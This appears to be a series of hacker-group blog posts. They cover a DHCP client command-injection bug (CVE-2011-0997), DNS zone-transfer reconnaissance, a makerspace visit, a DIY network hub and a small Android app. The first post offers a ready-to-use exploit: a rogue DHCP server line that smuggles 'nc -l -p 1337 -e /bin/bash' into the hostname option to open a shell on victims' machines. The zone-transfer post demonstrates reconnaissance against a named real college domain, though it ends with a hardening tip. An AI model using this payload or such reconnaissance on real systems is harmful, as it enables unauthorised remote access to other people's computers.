Fun with CVE-2011-0997

Saw a killer dhcp client bug come across the wire the other day and thought it would be fun to play around with. Heres some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997

This is super easy to exploit, all you need to do is set up a DHCP server and edit the clients hostname to include our payload! Once you get dhcp up and running edit your /etc/dchp3/dhcpd.conf and locate the line that loks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now using the above payload when someone requests an IP from you and its accepted a shell will open on port 1337 on their machine πŸ˜€

What happens is the victims computer gets the hostname value from DHCP, then just runs it against the shell. Now because we added a shell metacharacter “;” we are telling the shell that it has multipliable commands to execute which in the above case its the commands to change the hostname to test and “nc -l -p 1337 -e /bin/bash”. Fun right? Ok thats it, peace.

Good times @ mke makerspace open house

Me and ngh made a trip to mke makerspace’s open house and man it was well worth the ride. Got to see lots of cool clocks πŸ˜€ make a little blinking LED in soldering class, watched a makerbot in action and tons more awesome stuff. Also thanx to makerspace we also have a nice DIY project to give away at the next dc414 meeting “the blinky light we made in soldering class” Heres some pics i took while there. Thats it, peace.
mke makerspace

Hacking with ODiG

Some of you maybe have seen this before, I had this post/tool on one of my old sites a long time ago. I am going to show you how to do a zone transfer using my online tool ODiG. Ok so its not really hacking but it can help you get a foot in the door. Wikipedia says a zone transfer also sometimes known by its (most common) opcode mnemonic AXFR, is a type of DNS transaction. It is one of the many mechanisms available for administrators to employ for replicating the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR). Nearly universal at one time, it is now becoming less popular in favor of the use of other database replication mechanisms that modern DNS server packages provide.

Ok so what all that means is a DNS zone transfer will give us all the subdomains a DNS has on record for a given domain. Like if we did a zone transfer on a DNS server that servces google we would get mail.google.com, code.google.com, images.google.com and so on. In other words giving you more access points into the network, now instead of just the www.target.com and what ever links you can find on the site you can attack anything they may have that goes out to the net. You might get lucky and find some test servers and who knows what else.

For testing I will be using morainepark.edu a local tech college. Now goto ODiG and use morainepark.edu as the target and in the query drop down select NS (nameserver), leave the rest as is, enter in the captcha and hit submit. Now we are looking for what ever DNS server holds records for the domain morainepark.edu so we will be looking in the β€œ;; AUTHORITY SECTION:” and we see β€œmorainepark.edu. 9863 IN NS dns.uw-mad.wiscnet.net” Here we see that dns.uw-mad.wiscnet.net is the DNS server that holds the records we want so now again go back to ODiG. Again put morainepark.edu as the target only this time put dns.uw-mad.wiscnet.net in the DNS server field and change the Query drop down box to AXFR (zone fransfer) enter in the captcha hit submit and you will be given all the records that DNS server holds for the morainepark.edu domain, now you can really get some scanning done!!

If you did the same thing to wisconsin.edu you would get a transfer failed message which will be the case with any secure DNS host. Now for the sake of security I wold hope ppl are pen-testing things before they expose them to the net, but more often then not they dont and that can get really messy! Securing BIND against this kind of information leak just edit /etc/bind.conf and add this line:
allow-transfer{192.168.1.4; 172.16.1.5; };

Where 192.168.1.4 and 172.16.1.5 are the only address you will allow transfers to and from. To secure other DNS server software look here: HERE

DIY 3 port powerless hub

Ever need a few extra ports for your network and didn’t want to spend more then a few dollars? Well dw5304 did, so he found a bunch of shit laying around his crib, made a little trip to radio shack and a few hours later he gives us the DIY 3 port powerless hub πŸ˜€ He was even nice enough to provide us with a easy follow along tut “complete with a list of tools/materials needed”, and some pics. Heres a few pics to start off with:


Download the tutorial HERE and make your own!! More pics inside. Many thanxs to dw5304 for all his hard work, dc414 wouldn’t be the same with out ya πŸ˜›

USBwake

USBwake is a little Android app that just listens for the device to start charging, then while its charging does not let it go to sleep. I was using the wifi tether a lot lately and it would kill my connection everytime my fone would go to sleep so i made this little guy. I hope some one can get some use out of it, enjoy πŸ™‚

DOWNLOAD: USBwake
USBwake QR